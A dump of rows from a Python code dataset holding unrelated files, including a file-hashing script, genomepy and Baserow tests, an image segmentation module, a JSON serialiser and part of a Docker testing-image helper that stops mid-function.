id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1740638 | <reponame>Myne-us/pedb
import os
import sys
import hashlib
walk_dir = sys.argv[1]
def md5_for_file(path, block_size=2**20):
f = open(path)
md5 = hashlib.md5()
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
f.close()
return md5.digest().encode("hex")
for root, subdirs, files in os.walk(walk_dir):
for file in files:
print file + " : ",
print hashlib.md5(open(root +"\\"+ file, 'rb').read()).hexdigest()
# print md5_for_file(root +"\\"+ file)
| StarcoderdataPython |
1763311 | from tempfile import mkdtemp, NamedTemporaryFile
import genomepy
import shutil
import pytest
import os
# Python 2
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
travis = "TRAVIS" in os.environ and os.environ["TRAVIS"] == "true"
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ucsc_human():
"""Test UCSC.
Download human genome from UCSC and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("hg38", "UCSC", genome_dir=tmp)
g = genomepy.Genome("hg38", genome_dir=tmp)
seq = g["chr6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ensembl_human():
"""Test Ensembl.
Download human genome from Ensembl and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("GRCh38.p12", "Ensembl", genome_dir=tmp)
g = genomepy.Genome("GRCh38.p12", genome_dir=tmp)
seq = g["6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
@pytest.mark.skipif(travis,
reason="Too slow for Travis")
@pytest.mark.slow
def test_ncbi_human():
"""Test NCBI.
Download human genome from NCBI and retrieve a
specific sequence.
"""
tmp = mkdtemp()
genomepy.install_genome("GRCh38.p9", "NCBI", genome_dir=tmp)
g = genomepy.Genome("GRCh38.p9", genome_dir=tmp)
seq = g["6"][166168664:166168679]
assert str(seq) == "CCTCCTCGCTCTCTT"
shutil.rmtree(tmp)
| StarcoderdataPython |
1748693 | include("$(PORT_DIR)/boards/manifest.py")
freeze("$(PORT_DIR)/boards/UM_TINYPICO/modules", "dotstar.py")
freeze("modules")
| StarcoderdataPython |
1629315 | from urllib.parse import urlparse
def is_uri(uri, uri_type):
return '/' in uri and uri_type in uri
def get_feature_from_uri(uri, feature):
return uri.split(feature)[-1].split('/')[1]
def extract_artifact_id(artifact_uri):
return int(urlparse(artifact_uri).path.split('/')[-1])
def is_list(l):
# TODO: make this not suck.
return type(l) == list
def listify_duplicate_keys(job_inputs, decode_to_str=False):
inputs = {}
for input_ in job_inputs:
key = input_.key
value = input_.value.decode('utf-8') if decode_to_str else input_.value
if key in inputs:
if is_list(inputs[key]):
inputs[key].append(value)
else:
inputs[key] = [inputs[key], value]
else:
inputs[key] = value
return inputs
| StarcoderdataPython |
1723575 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import itertools
import copy
import joblib
import numpy
import scipy.sparse
import segment
import collections
import skimage.io
import features
import color_space
def _calc_adjacency_matrix(label_img, n_region):
r = numpy.vstack([label_img[:, :-1].ravel(), label_img[:, 1:].ravel()])
b = numpy.vstack([label_img[:-1, :].ravel(), label_img[1:, :].ravel()])
t = numpy.hstack([r, b])
A = scipy.sparse.coo_matrix((numpy.ones(t.shape[1]), (t[0], t[1])), shape=(n_region, n_region), dtype=bool).todense().getA()
A = A | A.transpose()
for i in range(n_region):
A[i, i] = True
dic = {i : {i} ^ set(numpy.flatnonzero(A[i])) for i in range(n_region)}
Adjacency = collections.namedtuple('Adjacency', ['matrix', 'dictionary'])
return Adjacency(matrix = A, dictionary = dic)
def _new_adjacency_dict(A, i, j, t):
Ak = copy.deepcopy(A)
Ak[t] = (Ak[i] | Ak[j]) - {i, j}
del Ak[i], Ak[j]
for (p, Q) in Ak.items():
if i in Q or j in Q:
Q -= {i, j}
Q.add(t)
return Ak
def _new_label_image(F, i, j, t):
Fk = numpy.copy(F)
Fk[Fk == i] = Fk[Fk == j] = t
return Fk
def _build_initial_similarity_set(A0, feature_extractor):
S = list()
for (i, J) in A0.items():
S += [(feature_extractor.similarity(i, j), (i, j)) for j in J if i < j]
return sorted(S)
def _merge_similarity_set(feature_extractor, Ak, S, i, j, t):
# remove entries which have i or j
S = list(filter(lambda x: not(i in x[1] or j in x[1]), S))
# calculate similarity between region t and its adjacencies
St = [(feature_extractor.similarity(t, x), (t, x)) for x in Ak[t] if t < x] +\
[(feature_extractor.similarity(x, t), (x, t)) for x in Ak[t] if x < t]
return sorted(S + St)
def hierarchical_segmentation(I, k = 100, feature_mask = features.SimilarityMask(1, 1, 1, 1)):
F0, n_region = segment.segment_label(I, 0.8, k, 100)
adj_mat, A0 = _calc_adjacency_matrix(F0, n_region)
feature_extractor = features.Features(I, F0, n_region)
# stores list of regions sorted by their similarity
S = _build_initial_similarity_set(A0, feature_extractor)
# stores region label and its parent (empty if initial).
R = {i : () for i in range(n_region)}
A = [A0] # stores adjacency relation for each step
F = [F0] # stores label image for each step
# greedy hierarchical grouping loop
while len(S):
(s, (i, j)) = S.pop()
t = feature_extractor.merge(i, j)
# record merged region (larger region should come first)
R[t] = (i, j) if feature_extractor.size[j] < feature_extractor.size[i] else (j, i)
Ak = _new_adjacency_dict(A[-1], i, j, t)
A.append(Ak)
S = _merge_similarity_set(feature_extractor, Ak, S, i, j, t)
F.append(_new_label_image(F[-1], i, j, t))
# bounding boxes for each hierarchy
L = feature_extractor.bbox
return (R, F, L)
def _generate_regions(R, L):
n_ini = sum(not parent for parent in R.values())
n_all = len(R)
regions = list()
for label in R.keys():
i = min(n_all - n_ini + 1, n_all - label)
vi = numpy.random.rand() * i
regions.append((vi, L[i]))
return sorted(regions)
def _selective_search_one(I, color, k, mask):
I_color = color_space.convert_color(I, color)
(R, F, L) = hierarchical_segmentation(I_color, k, mask)
return _generate_regions(R, L)
def selective_search(I, color_spaces = ['rgb'], ks = [100], feature_masks = [features.SimilarityMask(1, 1, 1, 1)], n_jobs = -1):
parameters = itertools.product(color_spaces, ks, feature_masks)
region_set = joblib.Parallel(n_jobs = n_jobs)(joblib.delayed(_selective_search_one)(I, color, k, mask) for (color, k, mask) in parameters)
#flatten list of list of tuple to list of tuple
regions = sum(region_set, [])
return sorted(regions)
| StarcoderdataPython |
122999 | <filename>tests/unit_tests/test_collection.py
import pytest
def test_collection_kwargs_become_properties(base_collection):
assert base_collection.custom_val == 'custom'
def test_collection_sorts_alphabetically(base_collection):
assert base_collection.pages[0].slug == 'Title_C'
| StarcoderdataPython |
87489 | <reponame>ashishdhngr/baserow
from unittest.mock import patch, call, ANY
import pytest
from django.db import transaction
from baserow.contrib.database.api.constants import PUBLIC_PLACEHOLDER_ENTITY_ID
from baserow.contrib.database.rows.handler import RowHandler
from baserow.contrib.database.views.handler import ViewHandler
from baserow.core.trash.handler import TrashHandler
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_created_public_views_receive_restricted_row_created_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# No public events should be sent to this form view
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
row = RowHandler().create_row(
user=user,
table=table,
values={
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_created_public_views_receive_row_created_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
row = RowHandler().create_row(
user=user,
table=table,
values={
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_deleted_public_views_receive_restricted_row_deleted_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
RowHandler().delete_row(user, table, row.id, model)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_deleted",
"row_id": row.id,
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_deleted",
"row_id": row.id,
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_deleted_public_views_receive_row_deleted_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
RowHandler().delete_row(user, table, row.id, model)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_deleted",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_id": row.id,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_not_visible_in_public_view_when_updated_to_be_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_filters_initially_hiding_all_rows = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_filters_initially_hiding_all_rows, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_filters_initially_hiding_all_rows,
field=visible_field,
type="equal",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_filters_initially_hiding_all_rows,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
initially_hidden_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesntMatchFilter",
},
)
# Double check the row isn't visible in any views to begin with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_hidden_row) == []
RowHandler().update_row(
user,
table,
initially_hidden_row.id,
values={f"field_{hidden_field.id}": "ValueWhichMatchesFilter"},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_filters_initially_hiding_all_rows.slug}",
{
# The row should appear as a created event as for the public view
# it effectively has been created as it didn't exist before.
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": initially_hidden_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_updated_to_be_not_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_row_showing = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_row_showing, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
initially_visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_visible_row) == [
public_view_with_row_showing.view_ptr
]
# Update the row so it is no longer visible
RowHandler().update_row(
user,
table,
initially_visible_row.id,
values={
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchFilter",
f"field_{visible_field.id}": "StillVisibleButNew",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_row_showing.slug}",
{
# The row should appear as a deleted event as for the public view
# it effectively has been.
"type": "row_deleted",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_id": initially_visible_row.id,
"row": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent in its state before it
# was updated
f"field_{visible_field.id}": "Visible",
},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_updated_to_still_be_visible_event_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_with_row_showing = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_with_row_showing, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_with_row_showing,
field=hidden_field,
type="contains",
value="e",
)
model = table.get_model()
initially_visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "e",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(initially_visible_row) == [
public_view_with_row_showing.view_ptr
]
# Update the row so it is still visible but changed
RowHandler().update_row(
user,
table,
initially_visible_row.id,
values={
f"field_{hidden_field.id}": "eee",
f"field_{visible_field.id}": "StillVisibleButUpdated",
},
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_with_row_showing.slug}",
{
"type": "row_updated",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_before_update": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"row": {
"id": initially_visible_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "StillVisibleButUpdated",
},
"metadata": {},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_restored_public_views_receive_restricted_row_created_ws_event(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_only_showing_one_field = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_showing_all_fields = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_only_showing_one_field, hidden_field, hidden=True
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
TrashHandler.trash(
user, table.database.group, table.database, row, parent_id=table.id
)
TrashHandler.restore_item(user, "row", row.id, parent_trash_item_id=table.id)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_only_showing_one_field.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
call(
f"view-{public_view_showing_all_fields.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
f"field_{visible_field.id}": "Visible",
# This field is not hidden for this public view and so should be
# included
f"field_{hidden_field.id}": "Hidden",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_when_row_restored_public_views_receive_row_created_only_when_filters_match(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view_showing_row = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
public_view_hiding_row = data_fixture.create_grid_view(
user, table=table, public=True, order=1
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(
public_view_showing_row, hidden_field, hidden=True
)
data_fixture.create_grid_view_field_option(
public_view_hiding_row, hidden_field, hidden=True
)
# Match the visible field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=visible_field, type="equal", value="Visible"
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view_hiding_row, field=hidden_field, type="equal", value="Not Match"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=visible_field, type="equal", value="Visible"
)
# Match
data_fixture.create_view_filter(
view=public_view_showing_row, field=hidden_field, type="equal", value="Hidden"
)
model = table.get_model()
row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "Hidden",
},
)
TrashHandler.trash(
user, table.database.group, table.database, row, parent_id=table.id
)
TrashHandler.restore_item(user, "row", row.id, parent_trash_item_id=table.id)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view_showing_row.slug}",
{
"type": "row_created",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row": {
"id": row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
"before_row_id": None,
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_visible_in_public_view_when_moved_row_updated_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(public_view, hidden_field, hidden=True)
# Match the visible field
data_fixture.create_view_filter(
view=public_view,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
visible_moving_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
invisible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(visible_moving_row) == [
public_view.view_ptr
]
# Move the visible row behind the invisible one
with transaction.atomic():
RowHandler().move_row(
user, table, visible_moving_row.id, before=invisible_row, model=model
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
call(
f"view-{public_view.slug}",
{
# The row should appear as a deleted event as for the public view
# it effectively has been.
"type": "row_updated",
"table_id": PUBLIC_PLACEHOLDER_ENTITY_ID,
"row_before_update": {
"id": visible_moving_row.id,
"order": "1.00000000000000000000",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"row": {
"id": visible_moving_row.id,
"order": "0.99999999999999999999",
# Only the visible field should be sent
f"field_{visible_field.id}": "Visible",
},
"metadata": {},
},
None,
),
]
)
@pytest.mark.django_db(transaction=True)
@patch("baserow.ws.registries.broadcast_to_channel_group")
def test_given_row_invisible_in_public_view_when_moved_no_update_sent(
mock_broadcast_to_channel_group, data_fixture
):
user = data_fixture.create_user()
table = data_fixture.create_database_table(user=user)
visible_field = data_fixture.create_text_field(table=table)
hidden_field = data_fixture.create_text_field(table=table)
public_view = data_fixture.create_grid_view(
user, create_options=False, table=table, public=True, order=0
)
# Should not appear in any results
data_fixture.create_form_view(user, table=table, public=True)
data_fixture.create_grid_view_field_option(public_view, hidden_field, hidden=True)
# Match the visible field
data_fixture.create_view_filter(
view=public_view,
field=visible_field,
type="contains",
value="Visible",
)
# But filter out based on the hidden field
data_fixture.create_view_filter(
view=public_view,
field=hidden_field,
type="equal",
value="ValueWhichMatchesFilter",
)
model = table.get_model()
visible_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichMatchesFilter",
},
)
invisible_moving_row = model.objects.create(
**{
f"field_{visible_field.id}": "Visible",
f"field_{hidden_field.id}": "ValueWhichDoesNotMatchesFilter",
},
)
# Double check the row is visible in the view to start with
row_checker = ViewHandler().get_public_views_row_checker(
table, model, only_include_views_which_want_realtime_events=True
)
assert row_checker.get_public_views_where_row_is_visible(invisible_moving_row) == []
# Move the invisible row
with transaction.atomic():
RowHandler().move_row(
user, table, invisible_moving_row.id, before=visible_row, model=model
)
assert mock_broadcast_to_channel_group.delay.mock_calls == (
[
call(f"table-{table.id}", ANY, ANY),
]
)
| StarcoderdataPython |
1730466 | <reponame>adamlwgriffiths/jaweson
"""Provides Object -> JSON -> Object serialisation functionality.
This code is designed to avoid any `eval` calls which could be
exploited, if the database were compromised, with malicious code.
To avoid calling `eval` on the class type, classes must be registered
with the `register_type` function.
Note: A badly written class could still parse internal data using eval.
"""
from __future__ import absolute_import
from . import serialiser
import json
from json import *
def to_dict(obj):
s = serialiser.find_serialiser(obj)
if s:
return s.to_dict(obj)
raise TypeError('Unable to serialise object of type {}'.format(type(obj)))
def from_dict(jobj):
if '__type__' in jobj:
s = serialiser.find_deserialiser(jobj['__type__'])
if s:
return s.from_dict(jobj)
return jobj
| StarcoderdataPython |
3210613 | <reponame>Jacky3213/face-recognition-system
from register import*
from live import*
if __name__ == '__main__':
root_path = '../data/NIR' ## images_NIR 20180625faceImages BGR
register_all(root_path)
test_live(root_path) | StarcoderdataPython |
46684 | <filename>dusty/systems/docker/testing_image.py<gh_stars>100-1000
from __future__ import absolute_import
import docker
from ...compiler.compose import container_code_path, get_volume_mounts
from ...compiler.spec_assembler import get_expanded_libs_specs
from ...log import log_to_client
from ...command_file import dusty_command_file_name, lib_install_commands_for_app_or_lib
from .common import spec_for_service
from . import get_docker_client
from ... import constants
class ImageCreationError(Exception):
def __init__(self, code):
self.code = code
message = 'Run exited with code {}'.format(code)
super(ImageCreationError, self).__init__(message)
def _ensure_base_image(app_or_lib_name):
testing_spec = _testing_spec(app_or_lib_name)
log_to_client('Getting the base image for the new image')
docker_client = get_docker_client()
if 'image' in testing_spec:
_ensure_image_pulled(testing_spec['image'])
return testing_spec['image']
elif 'build' in testing_spec:
image_tag = 'dusty_testing_base/image'
log_to_client('Need to build the base image based off of the Dockerfile here: {}'.format(testing_spec['build']))
try:
docker_client.remove_image(image=image_tag)
except:
log_to_client('Not able to remove image {}'.format(image_tag))
docker_client.build(path=testing_spec['build'], tag=image_tag)
return image_tag
def _ensure_image_pulled(image_name):
docker_client = get_docker_client()
full_image_name = image_name
if ':' not in image_name:
full_image_name = '{}:latest'.format(image_name)
for image in docker_client.images():
if full_image_name in image['RepoTags']:
break
else:
split = image_name.split(':')
repo, tag = split[0], 'latest' if len(split) == 1 else split[1]
docker_client.pull(repo, tag, insecure_registry=True)
def _get_split_volumes(volumes):
print volumes
split_volumes = []
for volume in volumes:
volume_list = volume.split(':')
split_volumes.append({'host_location': volume_list[0],
'container_location': volume_list[1]})
return split_volumes
def _get_create_container_volumes(split_volumes):
return [volume_dict['container_location'] for volume_dict in split_volumes]
def _get_create_container_binds(split_volumes):
binds_dict = {}
for volume_dict in split_volumes:
binds_dict[volume_dict['host_location']] = {'bind': volume_dict['container_location'], 'ro': False}
return binds_dict
def _create_tagged_image(base_image_tag, new_image_tag, app_or_lib_name):
docker_client = get_docker_client()
command = _get_test_image_setup_command(app_or_lib_name)
split_volumes = _get_split_volumes(get_volume_mounts(app_or_lib_name, get_expanded_libs_specs(), test=True))
